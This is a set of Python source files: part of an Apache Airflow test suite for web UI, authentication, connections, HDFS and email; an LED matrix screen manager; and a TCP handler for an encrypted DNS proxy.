origin="/admin")
response = self.app.post("/admin/airflow/clear", data=form)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.end",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1.section-1-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-3",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-4",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-5",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.some-other-task",
response.data.decode('utf-8'))
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_partial(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_functool_partial&dag_id=test_task_view_type_check&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("A function with two args", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_instance(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_instance&dag_id=test_task_view_type_check&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("A __call__ method", response.data.decode('utf-8'))
def tearDown(self):
self.dag_bash.clear(start_date=EXAMPLE_DAG_DEFAULT_DATE,
end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
@conf_vars({('webserver', 'authenticate'): 'False', ('core', 'secure_mode'): 'True'})
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
class PasswordUserTest(unittest.TestCase):
def setUp(self):
user = models.User()
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user = PasswordUser(user)
self.password_user.username = "password_test"
@mock.patch('airflow.contrib.auth.backends.password_auth.generate_password_hash')
def test_password_setter(self, mock_gen_pass_hash):
mock_gen_pass_hash.return_value = b"hashed_pass" if six.PY3 else "hashed_pass"
self.password_user.password = "secure_password"
mock_gen_pass_hash.assert_called_with("secure_password", 12)
def test_password_unicode(self):
# In python2.7 no conversion is required back to str
# In python >= 3 the method must convert from bytes to str
self.password_user.password = "secure_password"
self.assertIsInstance(self.password_user.password, str)
def test_password_user_authenticate(self):
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_unicode_user_authenticate(self):
self.password_user.username = u"🐼" # This is a panda
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_authenticate_session(self):
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user.password = 'test_password'
session = Session()
session.add(self.password_user)
session.commit()
query_user = session.query(PasswordUser).filter_by(
username=self.password_user.username).first()
self.assertTrue(query_user.authenticate('test_password'))
session.query(models.User).delete()
session.commit()
session.close()
@conf_vars({('webserver', 'authenticate'): 'True',
('webserver', 'auth_backend'): 'airflow.contrib.auth.backends.password_auth'})
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = BeautifulSoup(response.data, 'html.parser')
return tree.find('input', attrs={'name': '_csrf_token'})['value']
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
@conf_vars({('webserver', 'authenticate'): 'True',
('webserver', 'auth_backend'): 'airflow.contrib.auth.backends.ldap_auth',
('ldap', 'uri'): 'ldap://openldap:389',
('ldap', 'user_filter'): 'objectClass=*',
('ldap', 'user_name_attr'): 'uid',
('ldap', 'bind_user'): 'cn=Manager,dc=example,dc=com',
('ldap', 'bind_password'): 'insecure',
('ldap', 'basedn'): 'dc=example,dc=com',
('ldap', 'cacert'): '',
})
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = BeautifulSoup(response.data, 'html.parser')
return tree.find('input', attrs={'name': '_csrf_token'})['value']
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
@conf_vars({('ldap', 'superuser_filter'): 'description=superuser',
('ldap', 'data_profiler_filter'): 'description=dataprofiler'})
def test_with_filters(self):
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
@conf_vars({('webserver', 'authenticate'): 'True',
('webserver', 'auth_backend'): 'airflow.contrib.auth.backends.ldap_auth',
('ldap', 'uri'): 'ldap://openldap:389',
('ldap', 'user_filter'): 'objectClass=*',
('ldap', 'user_name_attr'): 'uid',
('ldap', 'bind_user'): 'cn=Manager,dc=example,dc=com',
('ldap', 'bind_password'): 'insecure',
('ldap', 'basedn'): 'dc=example,dc=com',
('ldap', 'cacert'): '',
})
class LdapGroupTest(unittest.TestCase):
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
utils.db.initdb(rbac=True)
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
class WebHDFSHookTest(unittest.TestCase):
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None
if six.PY2:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
@conf_vars({('email', 'email_backend'): None})
class EmailTest(unittest.TestCase):
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
with conf_vars({('email', 'email_backend'): 'tests.core.send_email_test'}):
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='us-ascii', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
@conf_vars({('smtp', 'smtp_ssl'): 'False'})
class EmailSmtpTest(unittest.TestCase):
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
conf.get('smtp', 'SMTP_USER'),
conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({('smtp', 'smtp_ssl'): 'True'}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({
('smtp', 'smtp_user'): None,
('smtp', 'smtp_password'): None,
}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
screen.py
|
from .streamtools import Stream
from .image import Image
from .rainbow import color, msg
from .guiviewer import GuiViewer
from os import system
from time import sleep, process_time
from sys import argv
from threading import Thread
MAT_WIDTH = 64
MAT_HEIGHT = 16
class Screen:
"""
Screen is the Image manager for the plugins.
Each child of it is an Image and can be added with the 'add' method.
On each 'refresh' all the images are flattened to one Image and sent to
the streamer
Screen must have the same size as the matrix
Keyword arguments:
x -- x height (default MAT_HEIGHT)
y -- y width (default MAT_WIDTH)
matrix -- output to serial (default True)
show -- verbose output (default False)
fps -- not implemented (default 0)
"""
def __init__(
self,
width=MAT_WIDTH,
height=MAT_HEIGHT,
matrix=True,
show=False,
guishow=False,
fps=30,
tty='/dev/ttyACM0'):
self.set_fps(fps)
self.show = show
self._types = ["image.Image", "text.Text", "slide.Slide"]
self._image = Image(width=width, height=height)
self.__streamer = Stream(matrix=matrix, tty=tty)
self.__childs = []
self.__prev_fps = 0
if guishow:
self.show_gui()
def check_type(self, element):
"""Checks if the element has a valid type to be added to screen
"""
for type_ in self._types:
element_type = "<class '" + __package__ + '.' + type_ + "'>"
if str(type(element)) == element_type:
return True
msg("Wrong type", 2, "Screen.check_type", type(element), level=0)
return False
def set_fps(self, fps):
if fps > 0:
self._fps = 1 / fps
else:
self._fps = 0
def add(self, element, name="default", **kwargs):
"""
Add a new Image to the childs.
Returns true for success
Keyword arguments:
element -- Image
x -- x paste location (default 0)
y -- y paste location (default 0)
refresh -- blank Image after refresh (default True)
mode -- paste mode [Image.paste()] (default "fill")
name -- name (default "Child")
"""
x = kwargs.get('x', 0)
y = kwargs.get('y', 0)
refresh = kwargs.get('refresh', False)
mode = kwargs.get('mode', 'fill')
if self.check_type(element):
self.__childs.append(
(element.screen_data(), x, y, refresh, mode, name)
)
return True
return False
def insert(self, position, element, name="default", **kwargs):
"""Inserts a child to the screen before 'position'
Position can be a child name (first occurence) or an index
Returns True for success
Keyword arguments:
position -- Index or name to insert before
element -- Image
x -- x paste location (default 0)
y -- y paste location (default 0)
refresh -- blank Image after refresh (default True)
mode -- paste mode [Image.paste()] (default "fill")
name -- name (default "Child")
"""
x = kwargs.get('x', 0)
y = kwargs.get('y', 0)
refresh = kwargs.get('refresh', False)
mode = kwargs.get('mode', 'fill')
if self.check_type(element):
if type(position) == str:
for i, child in enumerate(self.__childs):
if position in child[5]:
self.__childs.insert(i, (
element.screen_data(), x, y, refresh, mode, name)
)
return True
elif type(position) == int:
self.__childs.insert(position, (
element.screen_data(), x, y, refresh, mode, name)
)
return True
return False
def replace(self, position, element, name='default', **kwargs):
"""Replaces a child at index 'position'
Returns True for success
Keyword arguments:
position -- Index or name to insert before
element -- Image
x -- x paste location (default 0)
y -- y paste location (default 0)
refresh -- blank Image after refresh (default True)
mode -- paste mode [Image.paste()] (default "fill")
name -- name (default "Child")
"""
x = kwargs.get('x', 0)
y = kwargs.get('y', 0)
refresh = kwargs.get('refresh', False)
mode = kwargs.get('mode', 'fill')
if self.check_type(element):
if type(position) == str:
for i, child in enumerate(self.__childs):
if position in child[5]:
self.__childs[i] = (
element.screen_data(), x, y, refresh, mode, name
)
return True
elif type(position) == int:
self.__childs[position] = (
element.screen_data(), x, y, refresh, mode, name
)
return True
return False
def remove(self, *names):
"""Delete one or more childs by their name
Returns True if a child was deleted otherwise False
"""
deleted = False
for name in names:
for child in self.__childs:
if name in child[5]:
self.__childs.remove(child)
deleted = True
return deleted
def remove_id(self, id_):
"""Delete a child by his id"""
if id_ <= len(self.__childs) - 1:
msg(self.__childs.pop(id_)[5], 0, "Removed", level=2)
else:
msg(
"no such child",
2,
"Screen.remove()",
len(self.__childs),
id_,
level=0
)
def remove_all(self):
"""Remove all childs"""
number_of_childs = len(self.__childs)
self.__childs = []
msg("Removed %i childs" % number_of_childs, 1, level=2)
def sleep_fps(self):
"""Rather precise (+0.00000x) fps waiter
"""
while (self.__prev_fps + self._fps) > process_time():
pass
self.__prev_fps = process_time()
def refresh(self):
"""
Flatten all childs into one Image and send it to the streamer
and/or print it in the terminal.
"""
self.sleep_fps()
self._image.blank()
for child in self.__childs:
self._image.paste(child[0], x=child[1], y=child[2], mode=child[4])
# Refresh
if child[3]:
child[0].blank()
self.__streamer.set_data(self._image)
self.__streamer.send_to_serial()
if self.show:
system('clear')
print(self.__streamer)
def __str__(self):
count = len(self.__childs) - 1
string = color("Screen", "green") + "\n"
for n, child in enumerate(self.__childs):
if n < count:
string += color('├─', 'blue')
else:
string += color('└─', 'blue')
string += color(str(n), 'red')
string += color("..", 'yellow')
string += color(child[5], 'green', False, None, "Underline")
if child[3]:
string += "[" + color("1", "magenta", False) + "]"
else:
string += "[" + color("O", "magenta", False) + "]"
string += "\n"
return string
def __getitem__(self, index):
if type(index) == int:
return self.__childs[index]
elif type(index) == str:
for child in self.__childs:
if index == child[5]:
return child
def show_gui(self):
"""
Instantiates the tkinter gui and gets it running. The gui is updated
from within itself by a function that is run at the end of each
turn of the tkinter mainloop.
"""
gui_thread = Thread(target=lambda: GuiViewer(self._image))
gui_thread.daemon = True
gui_thread.start()
|
tcp.py
|
import socketserver
import logging
import threading
import dns.message
import encrypted_dns.inbound_handler
from . import server
class StreamHandler(socketserver.StreamRequestHandler):
inbound_handler = None
def setup(self):
super().setup()
self.logger = logging.getLogger("encrypted_dns.inbound.StreamHandler <tcp://{}:{}>".format(
self.client_address[0],
self.client_address[1]
))
def handle(self):
"""
Forward received DNS queries to 'encrypted_dns.resolve.core'
to resolve through outbound protocols.
Send the resolved DNS responses to clients.
"""
data_len_octet = self.rfile.read(2)
data_len = int.from_bytes(data_len_octet, byteorder='big')
wire_data = self.rfile.read(data_len)
self.logger.debug("Receive inbound msg: {}, from tcp://{}:{}.".format(
wire_data,
self.client_address[0],
self.client_address[1]
))
try:
dns_message = dns.message.from_wire(wire_data)
if self.inbound_handler is None:
resp_msg = encrypted_dns.inbound_handler.InboundHandler.generate_failed_resp(dns_message)
resp_msg_wire = resp_msg.to_wire()
resp_msg_wire_len_octet = len(resp_msg_wire).to_bytes(2, byteorder='big')
self.wfile.write(resp_msg_wire_len_octet)
self.wfile.write(resp_msg_wire)
self.logger.debug("Sent resp msg: {}, to tcp://{}:{}.".format(
resp_msg_wire,
self.client_address[0],
self.client_address[1]
))
else:
resp_msg = self.inbound_handler.handle(dns_message, self.client_address)
resp_msg_wire = resp_msg.to_wire()
resp_msg_wire_len_octet = len(resp_msg_wire).to_bytes(2, byteorder='big')
self.wfile.write(resp_msg_wire_len_octet)
self.wfile.write(resp_msg_wire)
self.logger.debug("Sent resp msg: {}, to tcp://{}:{}.".format(
resp_msg_wire,
self.client_address[0],
self.client_address[1]
))
except Exception as exc:
self.logger.error('Inbound exception caused by msg {} with error: {}'.format(
wire_data,
str(exc)
))
return None
@classmethod
def set_inbound_handler(cls,
inbound_handler: encrypted_dns.inbound_handler.InboundHandler
):
cls.inbound_handler = inbound_handler
class StreamInbound(server.Server):
def __init__(self,
host: str,
port: int,
fam: int,
inbound_handler: encrypted_dns.inbound_handler.InboundHandler
):
super().__init__()
self.host = host
self.port = port
self.addr_fam = fam
